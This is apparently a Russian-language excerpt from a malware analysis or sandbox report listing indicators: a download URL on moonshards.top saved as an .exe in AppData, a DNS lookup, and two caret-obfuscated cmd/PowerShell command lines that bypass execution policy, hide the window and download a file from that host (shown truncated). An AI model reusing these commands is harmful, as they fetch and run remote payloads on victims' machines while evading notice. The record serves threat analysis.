Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWE^RShEll^.^EXe -exECuTi^o^NPOLiCy ^byp^ASs -noPRo^FILE -^win^Do^wST^y^L^e ^hId^DeN ^(^New-^oBJe^ct ^S^y^stEm.^ne^T^.w^eB^CL^i^E^N^T^).D^O^Wnl^oaDfIlE(^'http://moonshar...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "poWE^RShEll^.^EXe -exECuTi^o^NPOLiCy ^byp^ASs -noPRo^FILE -^win^Do^wST^y^L^e ^hId^DeN ^(^New-^oBJe^ct ^S^y^stEm.^ne^T^.w^eB^CL^i^E^N^T^).D^O^Wnl^oaDfIlE(^'http://moonshar...' (со скрытым окном)